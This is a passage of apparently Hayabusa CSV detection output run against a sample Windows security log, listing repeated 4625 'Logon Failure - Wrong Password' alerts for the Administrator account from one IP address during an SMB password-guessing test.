NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: 